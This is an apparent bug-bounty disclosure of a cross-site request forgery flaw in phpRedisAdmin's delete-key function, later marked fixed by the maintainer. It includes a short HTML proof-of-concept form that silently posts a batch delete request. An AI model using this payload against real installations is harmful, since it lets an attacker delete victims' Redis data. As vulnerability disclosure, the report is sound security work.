Cross-Site Request Forgery (CSRF) in erikdubbelboer/phpredisadmin


Reported on

Aug 23rd 2021

✍️ Description

The delete key functionality in the application is vulnerable to CSRF attack.

🕵️‍♂️ Proof of Concept

  <script>history.pushState('', '', '/')</script>
    <form action="https://domain.tld/phpRedisAdmin/delete.php?s=1&d=0&batch_del=1" method="POST">
      <input type="hidden" name="post" value="1" />
      <input type="hidden" name="selected&#95;keys" value="123&#44;" />
      <input type="submit" value="Submit request" />

💥 Impact

This vulnerability can let an attacker delete data from the database without the knowledge/interaction of the user.


We have contacted a member of the erikdubbelboer/phpredisadmin team and are waiting to hear back 2 years ago
Erik Dubbelboer marked this as fixed with commit b57e3b 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation